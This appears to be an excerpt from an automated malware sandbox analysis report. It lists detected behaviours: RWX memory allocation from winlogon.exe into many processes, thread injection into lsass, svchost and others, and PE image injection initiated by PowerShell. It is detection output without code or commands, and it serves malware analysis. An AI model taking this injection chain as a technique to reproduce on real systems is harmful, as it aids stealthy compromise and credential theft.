        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18D132A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1B780BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 264072F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C5BFFD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1AE450000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\more.com base: 234FE4F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1AAD1C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000 protect: page execute and read and writeJump to behavior
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\System32\winlogon.exe EIP: 277D2DF0Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\lsass.exe EIP: 8AEB4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FDC4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\dwm.exe EIP: 88914048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 86F44048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 85F84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 59CE4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 88B94048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 8CDB4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 4D884048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: C26D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: F1E64048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: FF5C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: E0564048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 2B364048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AC94048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 678A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: B0DA4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B944048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 51C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 35364048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 3D9B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 11144048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 6E194048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 19564048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: A63A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: FB3B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: F944048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: DA5A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 6E4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: F41B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 14124048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B8354048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 379A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: F1D64048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: EF544048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 351A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 9F194048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 6C5D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: CF264048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 58CB4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 21744048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A22F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 4E004048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 78704048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B7B34048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A8A04048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 8DE04048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: ABEB4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B8544048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 97F44048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 7F24048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 57B54048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: EF764048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 894C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 961C4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 1BC44048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 4A8A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 6BB34048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 339F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A2F84048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: E2B34048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D8A64048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: FBBC4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2A9B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 37204048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C3A94048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 29B347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 40474048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A9A64048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 104347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 148347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: DB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 130347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B9347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 11E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 304347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2B3347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D1347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 22A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2EB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 270347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2DB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 240347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 8A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2A5347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 301347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 98347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: D8347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 115347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 235347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 298347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: F3347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: C6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 7D347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 261347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 138347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 220347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2DA347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 24B347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: B6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 93347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 12D347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 6F347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 26F347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 11C347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 224347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 11E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: CB347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 78347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: ED347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 1FD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 240347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 7E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2D5347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 26F347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 14E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 9E347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: EF347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: A6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 12A347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 120347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: ED347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2B1347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 86347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2B6347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2AD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2EA347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 100347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2BE347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: FD347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2DC347CJump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 132A4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 80BB4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 72F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: BFFD4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: AE454048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 20454048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: FE4F4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 3C0E4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: unknown EIP: 2C604048Jump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\winlogon.exe base: 1B9277D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\lsass.exe base: 2158AEB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E89FDC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\dwm.exe base: 1F088910000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1AC86F40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 14785F80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC59CE0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 16588B90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 17A8CDB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F34D880000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 220C26D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25AF1E60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 27BFF5C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1CEE0560000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1B12B360000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1D16AC90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 244678A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 183B0DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1805B940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 191051C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD35360000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 21C3D9B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 12411140000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2D66E190000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 25F19560000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCA63A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E8FB3B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1F30F940000 value starts with: 4D5AJump to behavior
